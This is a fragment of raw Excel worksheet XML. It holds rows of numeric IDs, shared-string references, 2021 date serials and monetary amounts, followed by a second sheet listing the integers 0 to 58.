    <row r="5044" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5044">
        <v>26275</v>
      </c>
      <c r="B5044">
        <v>5768</v>
      </c>
      <c r="C5044" t="s">
        <v>9373</v>
      </c>
      <c r="D5044" t="s">
        <v>14143</v>
      </c>
      <c r="E5044">
        <v>12</v>
      </c>
      <c r="F5044" t="s">
        <v>14168</v>
      </c>
      <c r="G5044" s="1">
        <v>44369</v>
      </c>
      <c r="H5044">
        <v>150000</v>
      </c>
      <c r="I5044" t="s">
        <v>14145</v>
      </c>
    </row>
    <row r="5045" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5045">
        <v>26276</v>
      </c>
      <c r="B5045">
        <v>5768</v>
      </c>
      <c r="C5045" t="s">
        <v>9373</v>
      </c>
      <c r="D5045" t="s">
        <v>14143</v>
      </c>
      <c r="E5045">
        <v>12</v>
      </c>
      <c r="F5045" t="s">
        <v>9561</v>
      </c>
      <c r="G5045" s="1">
        <v>44369</v>
      </c>
      <c r="H5045">
        <v>50000</v>
      </c>
      <c r="I5045" t="s">
        <v>14145</v>
      </c>
      <c r="J5045" t="s">
        <v>9481</v>
      </c>
    </row>
    <row r="5046" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5046">
        <v>26277</v>
      </c>
      <c r="B5046">
        <v>5768</v>
      </c>
      <c r="C5046" t="s">
        <v>9373</v>
      </c>
      <c r="D5046" t="s">
        <v>14143</v>
      </c>
      <c r="E5046">
        <v>12</v>
      </c>
      <c r="F5046" t="s">
        <v>8913</v>
      </c>
      <c r="G5046" s="1">
        <v>44369</v>
      </c>
      <c r="H5046">
        <v>50000</v>
      </c>
      <c r="I5046" t="s">
        <v>14145</v>
      </c>
    </row>
    <row r="5047" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5047">
        <v>26283</v>
      </c>
      <c r="B5047">
        <v>5772</v>
      </c>
      <c r="C5047" t="s">
        <v>9340</v>
      </c>
      <c r="D5047" t="s">
        <v>14170</v>
      </c>
      <c r="E5047">
        <v>12</v>
      </c>
      <c r="F5047" t="s">
        <v>14171</v>
      </c>
      <c r="G5047" s="1">
        <v>44369</v>
      </c>
      <c r="H5047">
        <v>30000</v>
      </c>
      <c r="I5047" t="s">
        <v>14172</v>
      </c>
      <c r="J5047" t="s">
        <v>14173</v>
      </c>
    </row>
    <row r="5048" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5048">
        <v>26284</v>
      </c>
      <c r="B5048">
        <v>5772</v>
      </c>
      <c r="C5048" t="s">
        <v>9340</v>
      </c>
      <c r="D5048" t="s">
        <v>14170</v>
      </c>
      <c r="E5048">
        <v>12</v>
      </c>
      <c r="F5048" t="s">
        <v>9561</v>
      </c>
      <c r="G5048" s="1">
        <v>44369</v>
      </c>
      <c r="H5048">
        <v>30000</v>
      </c>
      <c r="I5048" t="s">
        <v>10853</v>
      </c>
    </row>
    <row r="5049" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5049">
        <v>26285</v>
      </c>
      <c r="B5049">
        <v>5772</v>
      </c>
      <c r="C5049" t="s">
        <v>9340</v>
      </c>
      <c r="D5049" t="s">
        <v>14170</v>
      </c>
      <c r="E5049">
        <v>12</v>
      </c>
      <c r="F5049" t="s">
        <v>14174</v>
      </c>
      <c r="G5049" s="1">
        <v>44369</v>
      </c>
      <c r="H5049">
        <v>30000</v>
      </c>
      <c r="I5049" t="s">
        <v>14175</v>
      </c>
      <c r="J5049" t="s">
        <v>14176</v>
      </c>
    </row>
    <row r="5050" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5050">
        <v>26286</v>
      </c>
      <c r="B5050">
        <v>2324</v>
      </c>
      <c r="C5050" t="s">
        <v>6701</v>
      </c>
      <c r="D5050" t="s">
        <v>14177</v>
      </c>
      <c r="E5050">
        <v>33</v>
      </c>
      <c r="F5050" t="s">
        <v>13636</v>
      </c>
      <c r="G5050" s="1">
        <v>44368</v>
      </c>
      <c r="H5050">
        <v>100000</v>
      </c>
      <c r="I5050" t="s">
        <v>9693</v>
      </c>
      <c r="J5050" t="s">
        <v>9934</v>
      </c>
    </row>
    <row r="5051" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5051">
        <v>26287</v>
      </c>
      <c r="B5051">
        <v>2324</v>
      </c>
      <c r="C5051" t="s">
        <v>6701</v>
      </c>
      <c r="D5051" t="s">
        <v>14177</v>
      </c>
      <c r="E5051">
        <v>33</v>
      </c>
      <c r="F5051" t="s">
        <v>11210</v>
      </c>
      <c r="G5051" s="1">
        <v>44369</v>
      </c>
      <c r="H5051">
        <v>100000</v>
      </c>
      <c r="I5051" t="s">
        <v>9693</v>
      </c>
      <c r="J5051" t="s">
        <v>9934</v>
      </c>
    </row>
    <row r="5052" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5052">
        <v>26288</v>
      </c>
      <c r="B5052">
        <v>2324</v>
      </c>
      <c r="C5052" t="s">
        <v>6701</v>
      </c>
      <c r="D5052" t="s">
        <v>14177</v>
      </c>
      <c r="E5052">
        <v>33</v>
      </c>
      <c r="F5052" t="s">
        <v>1746</v>
      </c>
      <c r="G5052" s="1">
        <v>44368</v>
      </c>
      <c r="H5052">
        <v>100000</v>
      </c>
      <c r="I5052" t="s">
        <v>9693</v>
      </c>
      <c r="J5052" t="s">
        <v>9934</v>
      </c>
    </row>
    <row r="5053" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5053">
        <v>26289</v>
      </c>
      <c r="B5053">
        <v>2324</v>
      </c>
      <c r="C5053" t="s">
        <v>6701</v>
      </c>
      <c r="D5053" t="s">
        <v>14177</v>
      </c>
      <c r="E5053">
        <v>33</v>
      </c>
      <c r="F5053" t="s">
        <v>7241</v>
      </c>
      <c r="G5053" s="1">
        <v>44368</v>
      </c>
      <c r="H5053">
        <v>100000</v>
      </c>
      <c r="I5053" t="s">
        <v>9693</v>
      </c>
      <c r="J5053" t="s">
        <v>9934</v>
      </c>
    </row>
    <row r="5054" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5054">
        <v>26294</v>
      </c>
      <c r="B5054">
        <v>159</v>
      </c>
      <c r="C5054" t="s">
        <v>109</v>
      </c>
      <c r="D5054" t="s">
        <v>9524</v>
      </c>
      <c r="E5054">
        <v>12</v>
      </c>
      <c r="F5054" t="s">
        <v>9438</v>
      </c>
      <c r="G5054" s="1">
        <v>44369</v>
      </c>
      <c r="H5054">
        <v>100000</v>
      </c>
      <c r="I5054" t="s">
        <v>10442</v>
      </c>
    </row>
    <row r="5055" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5055">
        <v>26295</v>
      </c>
      <c r="B5055">
        <v>159</v>
      </c>
      <c r="C5055" t="s">
        <v>109</v>
      </c>
      <c r="D5055" t="s">
        <v>9524</v>
      </c>
      <c r="E5055">
        <v>12</v>
      </c>
      <c r="F5055" t="s">
        <v>2924</v>
      </c>
      <c r="G5055" s="1">
        <v>44369</v>
      </c>
      <c r="H5055">
        <v>100000</v>
      </c>
      <c r="I5055" t="s">
        <v>10442</v>
      </c>
    </row>
    <row r="5056" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5056">
        <v>26296</v>
      </c>
      <c r="B5056">
        <v>1522</v>
      </c>
      <c r="C5056" t="s">
        <v>4691</v>
      </c>
      <c r="D5056" t="s">
        <v>14159</v>
      </c>
      <c r="E5056">
        <v>12</v>
      </c>
      <c r="F5056" t="s">
        <v>14178</v>
      </c>
      <c r="G5056" s="1">
        <v>44378</v>
      </c>
      <c r="H5056">
        <v>1000000</v>
      </c>
      <c r="J5056" t="s">
        <v>13340</v>
      </c>
    </row>
    <row r="5057" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5057">
        <v>26304</v>
      </c>
      <c r="B5057">
        <v>5819</v>
      </c>
      <c r="C5057" t="s">
        <v>9397</v>
      </c>
      <c r="D5057" t="s">
        <v>14179</v>
      </c>
      <c r="E5057">
        <v>8</v>
      </c>
      <c r="F5057" t="s">
        <v>8700</v>
      </c>
      <c r="G5057" s="1">
        <v>44371</v>
      </c>
      <c r="H5057">
        <v>2400</v>
      </c>
      <c r="I5057" t="s">
        <v>10966</v>
      </c>
    </row>
    <row r="5058" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5058">
        <v>26305</v>
      </c>
      <c r="B5058">
        <v>5819</v>
      </c>
      <c r="C5058" t="s">
        <v>9397</v>
      </c>
      <c r="D5058" t="s">
        <v>14179</v>
      </c>
      <c r="E5058">
        <v>8</v>
      </c>
      <c r="F5058" t="s">
        <v>14180</v>
      </c>
      <c r="G5058" s="1">
        <v>44371</v>
      </c>
      <c r="H5058">
        <v>1800</v>
      </c>
    </row>
    <row r="5059" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5059">
        <v>26329</v>
      </c>
      <c r="B5059">
        <v>5818</v>
      </c>
      <c r="C5059" t="s">
        <v>9389</v>
      </c>
      <c r="D5059" t="s">
        <v>14181</v>
      </c>
      <c r="E5059">
        <v>8</v>
      </c>
      <c r="F5059" t="s">
        <v>3076</v>
      </c>
      <c r="G5059" s="1">
        <v>44371</v>
      </c>
      <c r="H5059">
        <v>1000</v>
      </c>
      <c r="I5059" t="s">
        <v>10966</v>
      </c>
    </row>
    <row r="5060" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5060">
        <v>26330</v>
      </c>
      <c r="B5060">
        <v>5818</v>
      </c>
      <c r="C5060" t="s">
        <v>9389</v>
      </c>
      <c r="D5060" t="s">
        <v>14181</v>
      </c>
      <c r="E5060">
        <v>8</v>
      </c>
      <c r="F5060" t="s">
        <v>1276</v>
      </c>
      <c r="G5060" s="1">
        <v>44371</v>
      </c>
      <c r="H5060">
        <v>500</v>
      </c>
      <c r="I5060" t="s">
        <v>10966</v>
      </c>
    </row>
    <row r="5061" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5061">
        <v>26331</v>
      </c>
      <c r="B5061">
        <v>5818</v>
      </c>
      <c r="C5061" t="s">
        <v>9389</v>
      </c>
      <c r="D5061" t="s">
        <v>14181</v>
      </c>
      <c r="E5061">
        <v>8</v>
      </c>
      <c r="F5061" t="s">
        <v>10384</v>
      </c>
      <c r="G5061" s="1">
        <v>44371</v>
      </c>
      <c r="H5061">
        <v>500</v>
      </c>
      <c r="I5061" t="s">
        <v>10966</v>
      </c>
    </row>
    <row r="5062" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5062">
        <v>26332</v>
      </c>
      <c r="B5062">
        <v>2120</v>
      </c>
      <c r="C5062" t="s">
        <v>6709</v>
      </c>
      <c r="D5062" t="s">
        <v>14182</v>
      </c>
      <c r="E5062">
        <v>8</v>
      </c>
      <c r="F5062" t="s">
        <v>14183</v>
      </c>
      <c r="G5062" s="1">
        <v>44379</v>
      </c>
      <c r="H5062">
        <v>1000</v>
      </c>
      <c r="I5062" t="s">
        <v>14184</v>
      </c>
    </row>
    <row r="5063" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5063">
        <v>26333</v>
      </c>
      <c r="B5063">
        <v>2120</v>
      </c>
      <c r="C5063" t="s">
        <v>6709</v>
      </c>
      <c r="D5063" t="s">
        <v>14182</v>
      </c>
      <c r="E5063">
        <v>8</v>
      </c>
      <c r="F5063" t="s">
        <v>14185</v>
      </c>
      <c r="G5063" s="1">
        <v>44379</v>
      </c>
      <c r="H5063">
        <v>1500</v>
      </c>
      <c r="I5063" t="s">
        <v>14184</v>
      </c>
    </row>
    <row r="5064" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5064">
        <v>26334</v>
      </c>
      <c r="B5064">
        <v>2120</v>
      </c>
      <c r="C5064" t="s">
        <v>6709</v>
      </c>
      <c r="D5064" t="s">
        <v>14182</v>
      </c>
      <c r="E5064">
        <v>8</v>
      </c>
      <c r="F5064" t="s">
        <v>3076</v>
      </c>
      <c r="G5064" s="1">
        <v>44379</v>
      </c>
      <c r="H5064">
        <v>500</v>
      </c>
      <c r="I5064" t="s">
        <v>14184</v>
      </c>
    </row>
    <row r="5065" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5065">
        <v>26368</v>
      </c>
      <c r="B5065">
        <v>5928</v>
      </c>
      <c r="C5065" t="s">
        <v>9405</v>
      </c>
      <c r="D5065" t="s">
        <v>13936</v>
      </c>
      <c r="E5065">
        <v>32</v>
      </c>
      <c r="F5065" t="s">
        <v>12898</v>
      </c>
      <c r="G5065" s="1">
        <v>44372</v>
      </c>
      <c r="H5065">
        <v>300000</v>
      </c>
      <c r="I5065" t="s">
        <v>14186</v>
      </c>
      <c r="J5065" t="s">
        <v>14187</v>
      </c>
    </row>
    <row r="5066" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5066">
        <v>26370</v>
      </c>
      <c r="B5066">
        <v>1804</v>
      </c>
      <c r="C5066" t="s">
        <v>6611</v>
      </c>
      <c r="D5066" t="s">
        <v>13887</v>
      </c>
      <c r="E5066">
        <v>19</v>
      </c>
      <c r="F5066" t="s">
        <v>14188</v>
      </c>
      <c r="G5066" s="1">
        <v>44379</v>
      </c>
      <c r="H5066">
        <v>15000</v>
      </c>
      <c r="I5066" t="s">
        <v>14189</v>
      </c>
      <c r="J5066" t="s">
        <v>14190</v>
      </c>
    </row>
    <row r="5067" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5067">
        <v>26374</v>
      </c>
      <c r="B5067">
        <v>1804</v>
      </c>
      <c r="C5067" t="s">
        <v>6611</v>
      </c>
      <c r="D5067" t="s">
        <v>13887</v>
      </c>
      <c r="E5067">
        <v>19</v>
      </c>
      <c r="F5067" t="s">
        <v>9437</v>
      </c>
      <c r="G5067" s="1">
        <v>44379</v>
      </c>
      <c r="H5067">
        <v>15000</v>
      </c>
      <c r="I5067" t="s">
        <v>14189</v>
      </c>
      <c r="J5067" t="s">
        <v>14190</v>
      </c>
    </row>
    <row r="5068" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5068">
        <v>26385</v>
      </c>
      <c r="B5068">
        <v>2538</v>
      </c>
      <c r="C5068" t="s">
        <v>4142</v>
      </c>
      <c r="D5068" t="s">
        <v>14091</v>
      </c>
      <c r="E5068">
        <v>2</v>
      </c>
      <c r="F5068" t="s">
        <v>9438</v>
      </c>
      <c r="G5068" s="1">
        <v>44370</v>
      </c>
      <c r="H5068">
        <v>20000</v>
      </c>
      <c r="I5068" t="s">
        <v>9603</v>
      </c>
    </row>
    <row r="5069" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5069">
        <v>26409</v>
      </c>
      <c r="B5069">
        <v>5790</v>
      </c>
      <c r="C5069" t="s">
        <v>9382</v>
      </c>
      <c r="D5069" t="s">
        <v>14191</v>
      </c>
      <c r="E5069">
        <v>33</v>
      </c>
      <c r="F5069" t="s">
        <v>547</v>
      </c>
      <c r="G5069" s="1">
        <v>44372</v>
      </c>
      <c r="H5069">
        <v>100000</v>
      </c>
      <c r="I5069" t="s">
        <v>14192</v>
      </c>
      <c r="J5069" t="s">
        <v>10298</v>
      </c>
    </row>
    <row r="5070" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5070">
        <v>26432</v>
      </c>
      <c r="B5070">
        <v>5622</v>
      </c>
      <c r="C5070" t="s">
        <v>16579</v>
      </c>
      <c r="D5070" t="s">
        <v>16580</v>
      </c>
      <c r="E5070">
        <v>28</v>
      </c>
      <c r="F5070" t="s">
        <v>364</v>
      </c>
      <c r="G5070" s="1">
        <v>44379</v>
      </c>
      <c r="H5070" s="4">
        <v>80000</v>
      </c>
      <c r="I5070" t="s">
        <v>9536</v>
      </c>
      <c r="J5070" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="5071" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5071">
        <v>26447</v>
      </c>
      <c r="B5071">
        <v>5671</v>
      </c>
      <c r="C5071" t="s">
        <v>248</v>
      </c>
      <c r="D5071" t="s">
        <v>14193</v>
      </c>
      <c r="E5071">
        <v>12</v>
      </c>
      <c r="F5071" t="s">
        <v>14194</v>
      </c>
      <c r="G5071" s="1">
        <v>44379</v>
      </c>
      <c r="H5071">
        <v>63000</v>
      </c>
      <c r="I5071" t="s">
        <v>9933</v>
      </c>
      <c r="J5071" t="s">
        <v>13027</v>
      </c>
    </row>
    <row r="5072" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5072">
        <v>26448</v>
      </c>
      <c r="B5072">
        <v>5671</v>
      </c>
      <c r="C5072" t="s">
        <v>248</v>
      </c>
      <c r="D5072" t="s">
        <v>14193</v>
      </c>
      <c r="E5072">
        <v>12</v>
      </c>
      <c r="F5072" t="s">
        <v>9437</v>
      </c>
      <c r="G5072" s="1">
        <v>44379</v>
      </c>
      <c r="H5072">
        <v>78000</v>
      </c>
      <c r="J5072" t="s">
        <v>13027</v>
      </c>
    </row>
    <row r="5073" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5073">
        <v>26449</v>
      </c>
      <c r="B5073">
        <v>5671</v>
      </c>
      <c r="C5073" t="s">
        <v>248</v>
      </c>
      <c r="D5073" t="s">
        <v>14193</v>
      </c>
      <c r="E5073">
        <v>12</v>
      </c>
      <c r="F5073" t="s">
        <v>14195</v>
      </c>
      <c r="G5073" s="1">
        <v>44379</v>
      </c>
      <c r="H5073">
        <v>48000</v>
      </c>
      <c r="I5073" t="s">
        <v>9933</v>
      </c>
      <c r="J5073" t="s">
        <v>13027</v>
      </c>
    </row>
    <row r="5074" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5074">
        <v>26491</v>
      </c>
      <c r="B5074">
        <v>5304</v>
      </c>
      <c r="C5074" t="s">
        <v>8539</v>
      </c>
      <c r="D5074" t="s">
        <v>13143</v>
      </c>
      <c r="E5074">
        <v>12</v>
      </c>
      <c r="F5074" t="s">
        <v>8913</v>
      </c>
      <c r="G5074" s="1">
        <v>44378</v>
      </c>
      <c r="H5074">
        <v>300000</v>
      </c>
      <c r="I5074" t="s">
        <v>14196</v>
      </c>
    </row>
    <row r="5075" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5075">
        <v>26497</v>
      </c>
      <c r="B5075">
        <v>5929</v>
      </c>
      <c r="C5075" t="s">
        <v>9410</v>
      </c>
      <c r="D5075" t="s">
        <v>14121</v>
      </c>
      <c r="E5075">
        <v>33</v>
      </c>
      <c r="F5075" t="s">
        <v>9437</v>
      </c>
      <c r="G5075" s="1">
        <v>44382</v>
      </c>
      <c r="H5075">
        <v>75000</v>
      </c>
      <c r="I5075" t="s">
        <v>9693</v>
      </c>
    </row>
    <row r="5076" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5076">
        <v>26498</v>
      </c>
      <c r="B5076">
        <v>5929</v>
      </c>
      <c r="C5076" t="s">
        <v>9410</v>
      </c>
      <c r="D5076" t="s">
        <v>14121</v>
      </c>
      <c r="E5076">
        <v>33</v>
      </c>
      <c r="F5076" t="s">
        <v>14197</v>
      </c>
      <c r="G5076" s="1">
        <v>44382</v>
      </c>
      <c r="H5076">
        <v>100000</v>
      </c>
      <c r="I5076" t="s">
        <v>14198</v>
      </c>
    </row>
    <row r="5077" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5077">
        <v>26499</v>
      </c>
      <c r="B5077">
        <v>5929</v>
      </c>
      <c r="C5077" t="s">
        <v>9410</v>
      </c>
      <c r="D5077" t="s">
        <v>14121</v>
      </c>
      <c r="E5077">
        <v>33</v>
      </c>
      <c r="F5077" t="s">
        <v>14199</v>
      </c>
      <c r="G5077" s="1">
        <v>44382</v>
      </c>
      <c r="H5077">
        <v>100000</v>
      </c>
      <c r="I5077" t="s">
        <v>9693</v>
      </c>
    </row>
    <row r="5078" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5078">
        <v>26500</v>
      </c>
      <c r="B5078">
        <v>5929</v>
      </c>
      <c r="C5078" t="s">
        <v>9410</v>
      </c>
      <c r="D5078" t="s">
        <v>14121</v>
      </c>
      <c r="E5078">
        <v>33</v>
      </c>
      <c r="F5078" t="s">
        <v>2236</v>
      </c>
      <c r="G5078" s="1">
        <v>44382</v>
      </c>
      <c r="H5078">
        <v>80000</v>
      </c>
      <c r="I5078" t="s">
        <v>9693</v>
      </c>
    </row>
    <row r="5079" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5079">
        <v>26501</v>
      </c>
      <c r="B5079">
        <v>5929</v>
      </c>
      <c r="C5079" t="s">
        <v>9410</v>
      </c>
      <c r="D5079" t="s">
        <v>14121</v>
      </c>
      <c r="E5079">
        <v>33</v>
      </c>
      <c r="F5079" t="s">
        <v>3763</v>
      </c>
      <c r="G5079" s="1">
        <v>44382</v>
      </c>
      <c r="H5079">
        <v>100000</v>
      </c>
    </row>
    <row r="5080" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5080">
        <v>26519</v>
      </c>
      <c r="B5080">
        <v>1977</v>
      </c>
      <c r="C5080" t="s">
        <v>6717</v>
      </c>
      <c r="D5080" t="s">
        <v>13969</v>
      </c>
      <c r="E5080">
        <v>33</v>
      </c>
      <c r="F5080" t="s">
        <v>3763</v>
      </c>
      <c r="G5080" s="1">
        <v>44379</v>
      </c>
      <c r="H5080">
        <v>100000</v>
      </c>
      <c r="I5080" t="s">
        <v>14200</v>
      </c>
    </row>
    <row r="5081" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5081">
        <v>26520</v>
      </c>
      <c r="B5081">
        <v>1977</v>
      </c>
      <c r="C5081" t="s">
        <v>6717</v>
      </c>
      <c r="D5081" t="s">
        <v>13969</v>
      </c>
      <c r="E5081">
        <v>33</v>
      </c>
      <c r="F5081" t="s">
        <v>2236</v>
      </c>
      <c r="G5081" s="1">
        <v>44379</v>
      </c>
      <c r="H5081">
        <v>100000</v>
      </c>
      <c r="I5081" t="s">
        <v>14200</v>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:L5081" xr:uid="{009E840C-E8A5-8945-BC9D-0CB0D1D13866}">
    <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:L5081">
      <sortCondition descending="1" ref="L1:L508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E94D8-3A37-0442-9668-E6486183BC23}">
  <dimension ref="A3:A5592"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="B28" sqref="B28"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="62.1640625" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="3" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A3" s="6" t="s">
        <v>16225</v>
      </c>
    </row>
    <row r="4" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A4" s="7">
        <v>0</v>
      </c>
    </row>
    <row r="5" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A5" s="7">
        <v>1</v>
      </c>
    </row>
    <row r="6" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A6" s="7">
        <v>2</v>
      </c>
    </row>
    <row r="7" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A7" s="7">
        <v>3</v>
      </c>
    </row>
    <row r="8" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A8" s="7">
        <v>4</v>
      </c>
    </row>
    <row r="9" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A9" s="7">
        <v>5</v>
      </c>
    </row>
    <row r="10" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A10" s="7">
        <v>6</v>
      </c>
    </row>
    <row r="11" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A11" s="7">
        <v>7</v>
      </c>
    </row>
    <row r="12" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A12" s="7">
        <v>8</v>
      </c>
    </row>
    <row r="13" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A13" s="7">
        <v>9</v>
      </c>
    </row>
    <row r="14" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A14" s="7">
        <v>10</v>
      </c>
    </row>
    <row r="15" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A15" s="7">
        <v>11</v>
      </c>
    </row>
    <row r="16" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A16" s="7">
        <v>12</v>
      </c>
    </row>
    <row r="17" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A17" s="7">
        <v>13</v>
      </c>
    </row>
    <row r="18" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A18" s="7">
        <v>14</v>
      </c>
    </row>
    <row r="19" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A19" s="7">
        <v>15</v>
      </c>
    </row>
    <row r="20" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A20" s="7">
        <v>16</v>
      </c>
    </row>
    <row r="21" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A21" s="7">
        <v>18</v>
      </c>
    </row>
    <row r="22" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A22" s="7">
        <v>19</v>
      </c>
    </row>
    <row r="23" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A23" s="7">
        <v>20</v>
      </c>
    </row>
    <row r="24" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A24" s="7">
        <v>21</v>
      </c>
    </row>
    <row r="25" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A25" s="7">
        <v>22</v>
      </c>
    </row>
    <row r="26" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A26" s="7">
        <v>23</v>
      </c>
    </row>
    <row r="27" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A27" s="7">
        <v>24</v>
      </c>
    </row>
    <row r="28" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A28" s="7">
        <v>25</v>
      </c>
    </row>
    <row r="29" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A29" s="7">
        <v>26</v>
      </c>
    </row>
    <row r="30" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A30" s="7">
        <v>27</v>
      </c>
    </row>
    <row r="31" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A31" s="7">
        <v>28</v>
      </c>
    </row>
    <row r="32" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A32" s="7">
        <v>29</v>
      </c>
    </row>
    <row r="33" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A33" s="7">
        <v>30</v>
      </c>
    </row>
    <row r="34" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A34" s="7">
        <v>31</v>
      </c>
    </row>
    <row r="35" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A35" s="7">
        <v>32</v>
      </c>
    </row>
    <row r="36" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A36" s="7">
        <v>33</v>
      </c>
    </row>
    <row r="37" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A37" s="7">
        <v>34</v>
      </c>
    </row>
    <row r="38" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A38" s="7">
        <v>35</v>
      </c>
    </row>
    <row r="39" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A39" s="7">
        <v>36</v>
      </c>
    </row>
    <row r="40" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A40" s="7">
        <v>37</v>
      </c>
    </row>
    <row r="41" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A41" s="7">
        <v>38</v>
      </c>
    </row>
    <row r="42" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A42" s="7">
        <v>39</v>
      </c>
    </row>
    <row r="43" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A43" s="7">
        <v>40</v>
      </c>
    </row>
    <row r="44" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A44" s="7">
        <v>41</v>
      </c>
    </row>
    <row r="45" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A45" s="7">
        <v>42</v>
      </c>
    </row>
    <row r="46" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A46" s="7">
        <v>43</v>
      </c>
    </row>
    <row r="47" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A47" s="7">
        <v>44</v>
      </c>
    </row>
    <row r="48" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A48" s="7">
        <v>45</v>
      </c>
    </row>
    <row r="49" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A49" s="7">
        <v>46</v>
      </c>
    </row>
    <row r="50" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A50" s="7">
        <v>47</v>
      </c>
    </row>
    <row r="51" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A51" s="7">
        <v>48</v>
      </c>
    </row>
    <row r="52" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A52" s="7">
        <v>49</v>
      </c>
    </row>
    <row r="53" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A53" s="7">
        <v>50</v>
      </c>
    </row>
    <row r="54" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A54" s="7">
        <v>51</v>
      </c>
    </row>
    <row r="55" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A55" s="7">
        <v>52</v>
      </c>
    </row>
    <row r="56" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A56" s="7">
        <v>53</v>
      </c>
    </row>
    <row r="57" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A57" s="7">
        <v>54</v>
      </c>
    </row>
    <row r="58" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A58" s="7">
        <v>55</v>
      </c>
    </row>
    <row r="59" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A59" s="7">
        <v>56</v>
      </c>
    </row>
    <row r="60" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A60" s="7">
        <v>57</v>
      </c>
    </row>
    <row r="61" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A61" s="7">
        <v>58</v>
      </c>
    </row>
